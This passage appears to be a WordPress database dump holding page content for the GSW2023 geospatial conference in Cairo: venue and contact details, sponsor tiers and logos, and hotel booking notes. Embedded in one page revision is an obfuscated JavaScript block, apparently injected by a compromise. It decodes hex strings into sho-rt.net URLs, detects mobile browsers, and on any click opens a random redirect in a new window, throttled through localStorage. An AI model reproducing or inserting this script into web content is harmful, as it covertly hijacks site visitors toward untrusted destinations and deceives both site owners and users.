custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-23 20:48:32','2023-06-23 20:48:32','',3066,'https://gsw2023.com/?p=4755',0,'revision','',0),
(4756,4,'2023-06-23 20:49:27','2023-06-23 20:49:27','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687553155258{margin-top: 0px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"325\" height=\"183\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 